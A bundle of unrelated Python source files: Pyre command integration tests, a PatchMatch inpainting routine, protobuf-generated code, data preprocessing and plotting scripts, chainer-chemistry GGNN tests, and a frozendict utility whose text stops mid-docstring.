                "targets": ["//example:target"],
            }
            self.assert_file_exists(
                "local_project/.pyre_configuration.local",
                json_contents=expected_contents,
            )
class KillTest(TestCommand):
    """Tests for `pyre kill` across zero, one, and two running servers."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_local_configuration("local_one", {"source_directories": ["."]})
        self.create_file_with_error("local_one/has_type_error.py")
        self.create_local_configuration("local_two", {"source_directories": ["."]})
        self.create_file_with_error("local_two/has_type_error.py")

    def test_kill_without_server(self) -> None:
        # Killing with no servers running still succeeds.
        self.assert_no_servers_exist()
        result = self.run_pyre("kill")
        self.assert_succeeded(result)
        self.assert_no_servers_exist()

    def test_kill(self) -> None:
        self.run_pyre("-l", "local_one", "start")
        self.assert_server_exists("local_one")
        self.run_pyre("kill")
        self.assert_no_servers_exist()
        self.run_pyre("-l", "local_one", "restart")
        self.assert_server_exists("local_one")
        self.run_pyre("kill")
        self.assert_no_servers_exist()
        # Kill takes down every running server at once.
        self.run_pyre("-l", "local_one")
        self.run_pyre("-l", "local_two")
        self.assert_server_exists("local_one")
        self.assert_server_exists("local_two")
        self.run_pyre("kill")
        self.assert_no_servers_exist()
class PersistentTest(TestCommand):
    """Placeholder for `pyre persistent` tests."""
    # TODO(T57341910): Fill in test cases.
    pass
class ProfileTest(TestCommand):
    """Placeholder for `pyre profile` tests."""
    # TODO(T57341910): Fill in test cases.
    pass
class QueryTest(TestCommand):
    """Placeholder for `pyre query` tests."""
    # TODO(T57341910): Fill in test cases.
    # TODO(T57341910): Test pyre query help.
    pass
class RageTest(TestCommand):
    """Placeholder for `pyre rage` tests."""
    # TODO(T57341910): Fill in test cases.
    pass
class ReportingTest(TestCommand):
    """Placeholder for reporting tests."""
    # TODO(T57341910): Fill in test cases.
    pass
class RestartTest(TestCommand):
    """Tests for `pyre restart`."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_local_configuration("local_one", {"source_directories": ["."]})
        self.create_file_with_error("local_one/has_type_error.py")
        self.create_local_configuration("local_two", {"source_directories": ["."]})
        self.create_file_with_error("local_two/has_type_error.py")

    def test_restart(self) -> None:
        # TODO(T57341910): Test blank restart
        self.assert_no_servers_exist()
        # Restart starts a server when none exists...
        result = self.run_pyre("-l", "local_one", "restart")
        self.assert_has_errors(result)
        self.assert_server_exists("local_one")
        # ...and restarts it when one does.
        result = self.run_pyre("-l", "local_one", "restart")
        self.assert_has_errors(result)
        self.assert_server_exists("local_one")
class ServersTest(TestCommand):
    """Tests for `pyre servers list` output."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_local_configuration("local_one", {"source_directories": ["."]})
        self.create_file_with_error("local_one/has_type_error.py")
        self.create_local_configuration("local_two", {"source_directories": ["."]})
        self.create_file_with_error("local_two/has_type_error.py")

    def test_list_servers(self) -> None:
        # No servers -> empty JSON list.
        result = self.run_pyre("--output=json", "servers", "list")
        self.assert_output_matches(result, re.compile(r"\[\]"))
        self.run_pyre("-l", "local_one")
        result = self.run_pyre("servers", "list")
        self.assert_output_matches(
            result, re.compile(r"\[\{\"pid\": .*, \"name\": \"local_one\"\}\]")
        )
        self.run_pyre("-l", "local_two")
        result = self.run_pyre("servers", "list")
        # With two servers the listing order is unspecified, so the
        # pattern accepts either name in either slot.
        self.assert_output_matches(
            result,
            re.compile(
                r"\[\{\"pid\": .*, \"name\": \"(local_one|local_two)\"\}, "
                + r"{\"pid\": .*, \"name\": \"(local_one|local_two)\"\}\]"
            ),
        )
class StartTest(TestCommand):
    """Tests for `pyre start`."""

    def cleanup(self) -> None:
        # Started servers must be killed between tests.
        self.run_pyre("kill")

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_directory("local_project")
        self.create_local_configuration("local_project", {"source_directories": ["."]})
        self.create_file_with_error("local_project/test.py")

    def test_server_start(self) -> None:
        with _watch_directory(self.directory):
            result = self.run_pyre("-l", "local_project", "start")
            self.assert_no_errors(result)
    # TODO(T57341910): Test concurrent pyre server processes.
class StatisticsTest(TestCommand):
    """Placeholder for `pyre statistics` tests."""
    # TODO(T57341910): Fill in test cases.
    pass
class StopTest(TestCommand):
    """Tests for `pyre stop`, including stopping one of several servers."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_local_configuration("local_one", {"source_directories": ["."]})
        self.create_file_with_error("local_one/has_type_error.py")
        self.create_local_configuration("local_two", {"source_directories": ["."]})
        self.create_file_with_error("local_two/has_type_error.py")

    def test_stop_without_server(self) -> None:
        # Stopping with no server running is a successful no-op.
        self.assert_no_servers_exist()
        result = self.run_pyre("stop")
        self.assert_succeeded(result)
        result = self.run_pyre("-l", "local_one", "stop")
        self.assert_succeeded(result)
        self.assert_no_servers_exist()

    def test_stop(self) -> None:
        self.run_pyre("-l", "local_one", "start")
        self.assert_server_exists("local_one")
        # Stopping a different project leaves this server running.
        self.run_pyre("-l", "local_two", "stop")
        self.assert_server_exists("local_one")
        self.run_pyre("-l", "local_one", "stop")
        self.assert_no_servers_exist()
        self.run_pyre("-l", "local_one", "restart")
        self.assert_server_exists("local_one")
        self.run_pyre("-l", "local_one", "stop")
        self.assert_no_servers_exist()
        # Stop only takes down the named server, not all of them.
        self.run_pyre("-l", "local_one", "start")
        self.run_pyre("-l", "local_two", "start")
        self.run_pyre("-l", "local_one", "stop")
        self.assert_server_exists("local_two")
        self.assert_server_does_not_exist("local_one")
# Run all integration tests when executed directly.
if __name__ == "__main__":
    unittest.main()
|
from __future__ import print_function, division
import numpy as np
import cv2
import matplotlib.pyplot as plt
import pycuda.driver as drv
import pycuda.autoinit
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
from PatchMatch.PatchMatchCuda import PatchMatch
def paint(Iorg, Mask, verbose=True, sigma=0.1):
    """Inpaint the masked region of an image by coarse-to-fine PatchMatch.

    Iorg: BGR image (3 channels assumed -- the code indexes shape[2]);
    Mask: nonzero where pixels must be synthesized (HxW or HxWx1).
    sigma controls the Gaussian patch-similarity weighting.
    Returns the inpainted image converted back to BGR.
    """
    # Work in Lab space so patch distances better match perception.
    Iorg=cv2.cvtColor(Iorg,cv2.COLOR_BGR2Lab)
    width=7        # patch side length; must be odd so patches are centered
    match_iter=10  # PatchMatch propagation iterations per pass
    diffthresh=1   # early-stop threshold on mean squared update over the mask
    if width%2==0:
        raise Exception('The width should be an odd integer.')
    padwidth=int(width/2)
    # Accept HxW or HxWx1 masks only.
    if Mask.ndim!=2:
        if Mask.ndim==3 and Mask.shape[2]==1:
            Mask=Mask[:,:,0]
        else:
            raise Exception('The dimension of Mask is incorrect.')
    [m,n,chn]=Iorg.shape
    # Coarsest scale: chosen so min(m, n) * 2**startscale is about 32 px.
    startscale=int(-np.ceil(np.log2(min(m,n)))+5)
    scale=2**startscale
    I=cv2.resize(Iorg,(0,0),fx=scale,fy=scale)
    M=cv2.resize(Mask,(0,0),fx=scale,fy=scale,interpolation=cv2.INTER_NEAREST)
    M=M>0
    [m,n,chn]=I.shape
    # Seed the unknown region with random noise at the coarsest scale.
    Rnd=np.random.randint(256,size=[m,n,chn],dtype='uint8')
    I[M]=Rnd[M]
    # Coarse-to-fine: logscale runs from startscale (negative) up to 0.
    for logscale in range(startscale,1):
        scale=2**logscale
        iterations=10
        if verbose:
            print('Scale = 2^%d'%logscale)
        for iter in range(iterations):
            if verbose:
                plt.imshow(cv2.cvtColor(I,cv2.COLOR_Lab2RGB))
                plt.pause(0.001)
            Iprev=I.astype('float32')
            I=Iprev/255
            # B zeros out the unknown pixels for the match source/target.
            B=I.copy()
            B[M]=0
            maxoff=max(I.shape[:2])
            # Nearest-neighbor field of the image matched against itself.
            pm=PatchMatch(I,I,B,B,width)
            pm.propagate(iters=match_iter,rand_search_radius=maxoff)
            ann=pm.nnf.copy()
            Ipad=np.pad(I,((padwidth,padwidth),(padwidth,padwidth),(0,0)),'reflect')
            # patchi/patchj enumerate every pixel's patch window in padded coords.
            patchj,patchi=np.meshgrid(np.arange(width),np.arange(width))
            indj,indi=np.meshgrid(np.arange(n),np.arange(m))
            patchi=indi[:,:,np.newaxis,np.newaxis]+patchi[np.newaxis,np.newaxis]
            patchj=indj[:,:,np.newaxis,np.newaxis]+patchj[np.newaxis,np.newaxis]
            # NOTE(review): assumes nnf channel 0 is the column (j) coordinate
            # and channel 1 the row (i) -- confirm against PatchMatchCuda.
            matchj=ann[:,:,0]
            matchi=ann[:,:,1]
            orgind=np.vstack((indi.ravel(),indj.ravel()))
            matchind=np.vstack((matchi[orgind[0],orgind[1]],matchj[orgind[0],orgind[1]]))
            indmap=np.vstack((orgind,matchind))
            # Keep only masked pixels; rows of indmap are (i, j, match_i, match_j).
            indmap=indmap[:,M[orgind[0],orgind[1]]]
            curi=patchi[indmap[0],indmap[1]]
            curj=patchj[indmap[0],indmap[1]]
            orgim=Ipad[curi,curj]
            # groupind maps every contributing patch pixel to its destination
            # cell (padded coordinates) for the weighted vote below.
            groupind=np.ravel_multi_index((curi,curj),(m+width-1,n+width-1))
            curi=patchi[indmap[2],indmap[3]]
            curj=patchj[indmap[2],indmap[3]]
            patchim=Ipad[curi,curj]
            #I 3 channels
            # Patch SSD -> Gaussian similarity weight.
            d=np.sum((orgim-patchim)**2,axis=(1,2,3))
            sim=np.exp(-d/(2*sigma**2),dtype='float64')
            R=sim[:,np.newaxis,np.newaxis,np.newaxis]*patchim
            # Accumulate weighted colors per destination pixel, per channel.
            sumpatch=[np.bincount(groupind.ravel(),weights=R[...,i].ravel()) for i in range(chn)]
            Rlst=[np.zeros([m+width-1,n+width-1],dtype='float64') for _ in range(chn)]
            for i in range(chn):
                Rlst[i].ravel()[:sumpatch[i].size]=sumpatch[i]
            R=np.dstack(Rlst)
            # Accumulate the matching weights for normalization.
            sim=np.tile(sim[:,np.newaxis,np.newaxis],[1,width,width])
            sumsim=np.bincount(groupind.ravel(),weights=sim.ravel())
            Rcount=np.zeros([m+width-1,n+width-1],dtype='float64')
            Rcount.ravel()[:sumsim.size]=sumsim
            Rcountmsk=Rcount>0
            R[Rcountmsk]=R[Rcountmsk]/Rcount[Rcountmsk,np.newaxis]
            # Crop the padding, restore known pixels, and requantize.
            R=R[padwidth:m+padwidth,padwidth:n+padwidth]
            R[~M]=I[~M]
            I=(255*R+0.5).astype('uint8')
            if iter>0:
                # Mean squared change over the mask; stop when converged.
                diff=np.sum((I.astype('float32')-Iprev)**2)/np.sum(M)
                if verbose:
                    print('diff = %f'%diff)
                if diff<diffthresh:
                    break
            elif verbose:
                print()
        # Upsample to the next finer scale, pulling known pixels from Iorg.
        if logscale<0:
            Idata=cv2.resize(Iorg,(0,0),fx=scale*2,fy=scale*2)
            m,n,chn=Idata.shape
            I=cv2.resize(I,(n,m))
            M=cv2.resize(Mask,(n,m),interpolation=cv2.INTER_NEAREST)
            M=M>0
            I[~M]=Idata[~M]
    return cv2.cvtColor(I,cv2.COLOR_Lab2BGR)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: label-transform-meta.proto
import sys
# _b: identity on py2; on py3 encode to latin1 bytes, as the protobuf
# runtime expects for the serialized descriptor blobs below.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

# File-level descriptor for label-transform-meta.proto.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='label-transform-meta.proto',
  package='com.webank.ai.fate.core.mlmodel.buffer',
  syntax='proto3',
  serialized_options=_b('B\027LabelTransformMetaProto'),
  serialized_pb=_b('\n\x1alabel-transform-meta.proto\x12&com.webank.ai.fate.core.mlmodel.buffer\"&\n\x12LabelTransformMeta\x12\x10\n\x08need_run\x18\x01 \x01(\x08\x42\x19\x42\x17LabelTransformMetaProtob\x06proto3')
)

# Message descriptor: LabelTransformMeta has a single bool field `need_run`.
_LABELTRANSFORMMETA = _descriptor.Descriptor(
  name='LabelTransformMeta',
  full_name='com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='need_run', full_name='com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta.need_run', index=0,
      number=1, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=70,
  serialized_end=108,
)

DESCRIPTOR.message_types_by_name['LabelTransformMeta'] = _LABELTRANSFORMMETA
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Concrete message class built from the descriptor above.
LabelTransformMeta = _reflection.GeneratedProtocolMessageType('LabelTransformMeta', (_message.Message,), {
  'DESCRIPTOR' : _LABELTRANSFORMMETA,
  '__module__' : 'label_transform_meta_pb2'
  # @@protoc_insertion_point(class_scope:com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta)
  })
_sym_db.RegisterMessage(LabelTransformMeta)

DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
from datetime import datetime
import attr
from requests import Session
from baseball_utils.gameday import GamedayData
from baseball_utils.savant import Savant
from baseball_utils.util import SESSION, default_attrs
def get_today():
    """Build a Today helper on the shared session and return its probables."""
    return Today(SESSION).probables()
@default_attrs()
class Today(object):
    # attrs-declared fields: the HTTP session, plus a GamedayData helper
    # derived from it (init=False keeps it out of the generated __init__).
    session: Session = attr.ib()
    gd: GamedayData = attr.ib(init=False)

    def __attrs_post_init__(self):
        # gd is derived state, built once the session attribute is set.
        self.gd = GamedayData(self.session, Savant(self.session))

    def probables(self):
        # TODO: not implemented yet -- currently returns None.
        pass
# Placeholder entry point (intentionally does nothing yet).
if __name__ == '__main__':
    pass
|
"""
This program is to make diagrams that are too frustrating to do by hand
"""
import matplotlib.pyplot as plt
import math
import numpy as np
def main(*args, **kwargs):
    """Make the diagram figures for Figure 2A (well plates of cells / DNA).

    Saves one PNG per mode ('cells' and 'dna') into the working directory.
    Modernized from Python 2 (print statements, xrange) to Python 3.
    """
    print('Creating figures for Figure 2A...')
    rows, columns = 8, 12  # plate dimensions (wells)
    cpw = 10               # cells drawn per well
    colors = [(a, a, a) for a in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]]
    well_dev = 0.2         # max radial scatter of cells inside a well
    cell_size = 100
    well_size = 60
    well_edge_size = 5
    margin = (0.7, 2)
    w_i = 5
    w_j = 7
    w_ij = 23              # wells shared between the two DNA index sets
    w_o = 61
    x = np.linspace(1, rows, rows)
    y = np.linspace(1, columns, columns)
    x_mesh, y_mesh = np.meshgrid(x, y)
    for mode in ['cells', 'dna']:
        np.random.seed(42)  # identical layout across both figures
        fig = plt.figure(figsize=(rows + margin[0], 0.9 * columns + margin[1]), dpi=200, facecolor='w', edgecolor='k')
        ax = plt.gca()
        if mode == 'cells':
            for i, j in zip(x_mesh.flatten(), y_mesh.flatten()):
                well_colors = [colors[np.random.randint(0, len(colors))] for _ in range(cpw)]
                # Uniform sampling inside a disc of radius well_dev.
                r, theta = [well_dev * np.sqrt(np.random.rand(cpw, 1)), 2 * math.pi * np.random.rand(cpw, 1)]
                x_mod, y_mod = r * np.cos(theta), r * np.sin(theta)
                x_well = i + x_mod
                y_well = j + y_mod
                plt.scatter(x_well, y_well, color=well_colors, s=cell_size, zorder=10)
        elif mode == 'dna':
            combos = [(i, j) for i in range(1, rows + 1) for j in range(1, columns + 1)]
            np.random.shuffle(combos)
            # NOTE(review): the slice bounds mix w_i and w_j (w_j_indices ends up
            # with w_i+w_ij entries, w_i_indices with w_j+w_ij, overlapping by
            # w_ij) -- the overlap looks intentional but confirm the counts.
            w_j_indices = combos[:w_i + w_ij]
            w_i_indices = combos[w_i:w_i + w_j + w_ij]
            sets = [(w_i_indices, (0.3, 0.3, 0.3), -0.1), (w_j_indices, (0.6, 0.6, 0.6), 0.1)]
            for w, c, shift in sets:
                for x, y in w:
                    # Small sine "squiggle" to suggest a DNA strand in the well.
                    dy = np.linspace(-0.25, 0.25, 101)
                    dx = 0.075 * np.sin(12 * dy)
                    plt.scatter(x + dy + 0, y + dx + shift, color=c, s=20)
        # Draw the well outlines underneath everything else.
        plt.plot(x_mesh, y_mesh, 'ko', color='black', markerfacecolor='white', markersize=well_size, zorder=0, markeredgewidth=well_edge_size)
        plt.xlim([0.5, rows + 0.5])
        plt.ylim([0.5, columns + 0.5])
        plt.axis('off')
        fig.patch.set_facecolor([0.9, 0.9, 0.9])
        plt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.02)
        # NOTE(review): `edgewidth` is not a savefig kwarg (linewidth?); recent
        # matplotlib versions may reject unknown kwargs -- confirm before upgrading.
        plt.savefig('{}.png'.format(mode), facecolor=fig.get_facecolor(), edgecolor='k', edgewidth=5)
        print('Saved {}.png!'.format(mode))
# Entry point when run as a script.
if __name__ == '__main__':
    main()
|
# -*- coding:utf8 -*-
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_wechatpy import Wechat
from flask_login import LoginManager
from flask_session import Session
from config import config
from wechatpy import WeChatClient
from wechatpy.client.api import WeChatJSAPI
# Shared Flask extension instances; presumably bound to the app elsewhere
# via init_app() in an application factory -- confirm against the callers.
db = SQLAlchemy()
wechat = Wechat()
#session = Session()
|
import pandas as pd
import numpy as np
# Load .npz data files containing all variables
data = np.load('/umbc/xfs1/cybertrn/sea-ice-prediction/data/merged_data/1979_2019_combined_data_25km.npz')
new_data = np.load('/umbc/xfs1/cybertrn/sea-ice-prediction/data/merged_data/2020_2021_combined_data_25km.npz')
for key in data.keys():
    print(key)
# Create lists of days per month
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
leap_months = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
month_lst = []
# Create a full list of days per month for each month in 1979-2019.
# NOTE: the simple `% 4` leap test is valid for this range (2000 IS a leap year).
for i in range(1979, 2020):
    if i % 4 == 0:
        month_lst.append(leap_months)
    else:
        month_lst.append(months)
month_lst = np.array(month_lst).reshape(-1)
# List of days per month for January 2020-June 2021
new_month_lst = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31, 31, 28, 31, 30, 31, 30]
# Iterate through each variable and add its monthly means to the final array.
final_arr = np.zeros((len(month_lst) + len(new_month_lst), 448, 304, 10))
var_idx = 0
for key in data.keys():
    print(key)
    if key == 'time' or key == 'lat' or key == 'lon':
        continue
    day_sum = 0
    var = data[key]
    var = np.where(var == -999.0, float("NaN"), var)  # Specify missing values as NaN
    new_var = new_data[key]
    # BUG FIX: the fallback array here used to be `var` (the 1979-2019 data),
    # which replaced every 2020-2021 value with the wrong years' data.
    new_var = np.where(new_var == -999.0, float("NaN"), new_var)  # Specify missing values as NaN
    if key == 'sea_ice':  # Any sea ice value above 252 indicates land or missing. Convert these values to NaN.
        # NOTE(review): this >252 cleanup is applied only to the 2020-2021
        # array -- confirm the 1979-2019 file is already cleaned.
        new_var = np.where(new_var > 252.0, float("NaN"), new_var)
    var_arr = np.zeros((len(month_lst) + len(new_month_lst), 448, 304))
    print(var.shape)
    print(var_arr.shape)
    for i in range(len(month_lst)):  # Calculate monthly means of the variable from 1979-2019 and add to overall array
        var_arr[i, :, :] = np.nanmean(var[day_sum:(day_sum + month_lst[i]), :, :], axis=0)
        if i % 12 == 0:
            print(day_sum)
        day_sum = day_sum + month_lst[i]
    day_sum = 0
    for j in range(len(new_month_lst)):  # Calculate monthly means of the variable from 2020-2021 and add to overall array
        var_arr[len(month_lst) + j, :, :] = np.nanmean(new_var[day_sum:(day_sum + new_month_lst[j]), :, :], axis=0)
        if j % 12 == 0:
            print(day_sum)
        day_sum = day_sum + new_month_lst[j]
    final_arr[:, :, :, var_idx] = var_arr  # Add variable monthly means to final array.
    var_idx += 1
print(final_arr.shape)
print(final_arr[:, :, :, -1])
# Save final data array with shape (510, 448, 304, 10) to a numpy array.
with open("/umbc/xfs1/cybertrn/reu2021/team1/research/preprocessing/whole_data.npy", "wb") as f:
    np.save(f, final_arr)
|
# coding: utf-8
from __future__ import division
import math
def mean_a(a):
    """Arithmetic mean of an iterable of numbers, in a single pass."""
    total = 0
    n = 0
    for value in a:
        total += value
        n += 1
    return total / n
def find_slope(X, Y):
    """Least-squares slope: b = (n*Sxy - Sx*Sy) / (n*Sxx - Sx^2)."""
    n = len(X)
    sum_xy = sum(x * y for x, y in zip(X, Y))
    sum_x = sum(X)
    sum_y = sum(Y)
    sum_xx = sum(x * x for x in X)
    return (n * sum_xy - sum_x * sum_y) / (n * sum_xx - sum_x * sum_x)
def find_constant(X, Y, m):
    """Intercept of the fitted line: c = mean(Y) - m * mean(X)."""
    return mean_a(Y) - m * mean_a(X)
def predict(X, m, c):
    """Apply y = m*x + c to every x in X and return the list of predictions."""
    return [m * x + c for x in X]
def main():
    """Fit a simple linear regression to sample scores and predict for x=80.

    Modernized from Python 2 print statements to Python 3 print() calls.
    """
    print("\n")
    X = [95, 85, 80, 70, 60]
    Y = [85, 95, 70, 65, 70]
    m = find_slope(X, Y)
    c = find_constant(X, Y, m)
    X1 = [80]
    Y1 = predict(X1, m, c)
    print(Y1)
    print("\n")
# Run the regression demo when executed directly.
if __name__ == '__main__':
    main()
|
import sys
import cv2 as cv
import matrixConverter
# Validate command-line arguments: input and output image paths.
if len(sys.argv) != 3:
    print("usage: python3 {} <input_image> <output_image>".format(sys.argv[0]))
    # BUG FIX: the example string had a `{}` placeholder but .format() was
    # called with no argument, which raised IndexError instead of printing.
    print("example: python3 {} image1.jpg image1_matrixed.jpg".format(sys.argv[0]))
    exit(1)

input_image = cv.imread(sys.argv[1])
if input_image is None:
    # Grammar fix of the user-facing error message.
    print("{} does not exist.".format(sys.argv[1]))
    exit(1)

# Convert the image, write the result, and display both for comparison.
matrixConverter.init(input_image.shape[1], input_image.shape[0])
output_image = matrixConverter.convert(input_image)
cv.imwrite(sys.argv[2], output_image)
cv.imshow('input', input_image)
cv.imshow('output', output_image)
cv.waitKey()
# Priority handling
# '|||' marks entries that sit at the same priority level; exact usage lives
# in the callers (not visible in this module).
SAME_LEVEL_PRIORITY_IDENTIFIER = '|||'
# Conditional decisions
# '||' expresses an OR between alternative conditions.
OR = '||'
# Sub-command names exposed by the tool.
MANAGE_COMMAND_NAME = 'manage'
WEBHOOK_MANAGER_COMMAND_NAME = 'webhook-manage'
# Priority labels ordered from most to least urgent.
DEFAULT_PRIORITY_LIST = ['Critical', 'High', 'Medium', 'Low']
|
from typing import Tuple # NOQA
from chainer import cuda
from chainer import gradient_check
import numpy
import pytest
from chainer_chemistry.config import MAX_ATOMIC_NUM
from chainer_chemistry.models.ggnn import GGNN
from chainer_chemistry.models.mlp import MLP
from chainer_chemistry.models.prediction import GraphConvPredictor
from chainer_chemistry.utils.permutation import permute_adj
from chainer_chemistry.utils.permutation import permute_node
# Small dimensions used by the fixtures/tests below.
atom_size = 5       # atoms per molecule (second axis of atom_data)
class_num = 7       # output classes predicted by the MLP head
n_unit = 11         # hidden dimension of both GGNN and MLP
out_dim = 4         # GGNN output dimension fed into the MLP
batch_size = 2
num_edge_type = 3   # adjacency channels (one per edge type)
@pytest.fixture
def model():
    # type: () -> GraphConvPredictor
    """GGNN graph-convolution network with an MLP readout head."""
    mlp = MLP(out_dim=class_num, hidden_dim=n_unit)
    ggnn = GGNN(
        out_dim=out_dim, hidden_dim=n_unit, num_edge_type=num_edge_type)
    return GraphConvPredictor(ggnn, mlp)
@pytest.fixture
def data():
    # type: () -> Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]
    """Deterministic random (atom ids, adjacency, upstream gradient) triple."""
    numpy.random.seed(0)  # keep test runs reproducible
    atom_data = numpy.random.randint(
        0, high=MAX_ATOMIC_NUM, size=(batch_size, atom_size)).astype('i')
    adj_data = numpy.random.randint(
        0, high=2, size=(batch_size, num_edge_type, atom_size,
                         atom_size)).astype('f')
    y_grad = numpy.random.uniform(-1, 1, (batch_size, class_num)).astype('f')
    return atom_data, adj_data, y_grad
def check_forward(model, atom_data, adj_data):
    # type: (GraphConvPredictor, numpy.ndarray, numpy.ndarray) -> None
    """Run a forward pass and check the prediction shape."""
    y_actual = cuda.to_cpu(model(atom_data, adj_data).data)
    assert y_actual.shape == (batch_size, class_num)
def test_forward_cpu(model, data):
    # type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
    """Forward pass on CPU (gradient not needed, so data[2] is dropped)."""
    check_forward(model, *data[:2])
@pytest.mark.gpu
def test_forward_gpu(model, data):
    # type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
    """Forward pass on GPU: move inputs and model to the device first."""
    atom_data, adj_data = map(cuda.to_gpu, data[:2])
    model.to_gpu()
    check_forward(model, atom_data, adj_data)
def test_backward_cpu(model, data):
    # type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
    """Numerical gradient check of the whole predictor on CPU."""
    atom_data, adj_data, y_grad = data
    gradient_check.check_backward(
        model, (atom_data, adj_data), y_grad, atol=1e-3, rtol=1e-3)
@pytest.mark.gpu
def test_backward_gpu(model, data):
    # type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
    """Numerical gradient check on GPU (all three arrays moved to device)."""
    atom_data, adj_data, y_grad = map(cuda.to_gpu, data)
    model.to_gpu()
    gradient_check.check_backward(
        model, (atom_data, adj_data), y_grad, atol=1e-3, rtol=1e-3)
def test_forward_cpu_graph_invariant(model, data):
    # type: (GraphConvPredictor, Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]) -> None # NOQA
    """Predictions must be invariant under a permutation of the graph nodes."""
    atom_data, adj_data = data[:2]
    y_actual = cuda.to_cpu(model(atom_data, adj_data).data)
    # Permute node order and the adjacency consistently; output should match.
    permutation_index = numpy.random.permutation(atom_size)
    permute_atom_data = permute_node(atom_data, permutation_index)
    permute_adj_data = permute_adj(adj_data, permutation_index)
    permute_y_actual = cuda.to_cpu(
        model(permute_atom_data, permute_adj_data).data)
    assert numpy.allclose(y_actual, permute_y_actual, rtol=1e-5, atol=1e-5)
# Allow running this test module directly.
if __name__ == '__main__':
    pytest.main([__file__, '-v', '-s'])
|
from collections.abc import Mapping
class kfrozendict(Mapping):
    """
    Immutable wrapper around a python dictionary.

    Pulled from pypi's `frozendict` library, which itself seems inspired by
    https://stackoverflow.com/a/2704866
    """

    def __init__(self, *args, **kwargs):
        # Snapshot the contents; the hash is computed lazily on first use.
        self._dict = dict(*args, **kwargs)
        self._hash = None

    def copy(self, **add_or_replace):
        """Return a new instance with `add_or_replace` merged over self."""
        return self.__class__(self, **add_or_replace)

    def renamed(self, from_key, to_key):
        """Return a copy with `from_key` relabeled as `to_key` (order kept)."""
        if from_key not in self:
            return self
        relabeled = {
            (to_key if existing_key == from_key else existing_key): value
            for existing_key, value in self.items()
        }
        return self.__class__(relabeled)

    def without(self, key, **kwargs):
        """Return a copy lacking `key`; the popped value is discarded."""
        remaining, _ = self.popout(key, **kwargs)
        return remaining

    def popout(self, key, _default=None):
        """Return (copy-without-key, value-or-_default) as a tuple."""
        popped = _default
        remaining = {}
        for existing_key, value in self.items():
            if existing_key == key:
                popped = value
            else:
                remaining[existing_key] = value
        return (
            self.__class__(remaining),
            popped,
        )

    def __getitem__(self, key):
        return self._dict[key]

    def __contains__(self, key):
        return key in self._dict

    def __iter__(self):
        return iter(self._dict)

    def __len__(self):
        return len(self._dict)

    def __repr__(self):
        return '<%s %r>' % (type(self).__name__, unfreeze(self._dict))

    def __hash__(self):
        # Cached XOR of per-item hashes: order-independent, like frozenset.
        if self._hash is None:
            digest = 0
            for item in self._dict.items():
                digest ^= hash(item)
            self._hash = digest
        return self._hash

    def copy_in(self, **kwargs):
        """Like copy(), but deep-freezes every supplied value first."""
        frozen = {key: deepfreeze(value) for key, value in kwargs.items()}
        return self.copy(**frozen)

    def unfreeze(self):
        return unfreeze(self)

    # 'uf' is shorthand for "unfreeze()"
    @property
    def uf(self):
        return self.unfreeze()

    def freeze(self):
        return deepfreeze(self)
def unfreeze(val):
    """Recursively convert kfrozendicts/dicts to dicts and sequences to lists."""
    if isinstance(val, (kfrozendict, dict)):
        return {key: unfreeze(value) for key, value in val.items()}
    if isinstance(val, (list, tuple)):
        return [unfreeze(item) for item in val]
    return val
def shallowfreeze(val):
    '''
    Freeze only the top level: dict -> kfrozendict, list -> tuple.

    Does not go deep into the object; saves time compared to the
    (effectively) "deepcopy" behavior of deepfreeze when nested values
    are already immutable.
    '''
    if isinstance(val, dict):
        return kfrozendict(val)
    if isinstance(val, list):
        return tuple(val)
    return val
def deepfreeze(val):
    """Recursively convert dict-likes to kfrozendicts and sequences to tuples."""
    if isinstance(val, (kfrozendict, dict)):
        frozen_items = [(key, deepfreeze(value)) for key, value in val.items()]
        return kfrozendict(frozen_items)
    if isinstance(val, (list, tuple)):
        return tuple(deepfreeze(item) for item in val)
    return val
class NotFrozenError(ValueError):
    """Raised when a value expected to be frozen still contains a dict/list."""
    pass
def _shallowassertfrozen(val):
    # Reject mutable top-level containers only; no recursion into children.
    if isinstance(val, (dict, list)):
        raise NotFrozenError(val)
def assertfrozen(val):
    """Recursively verify `val` is deeply frozen and return it.

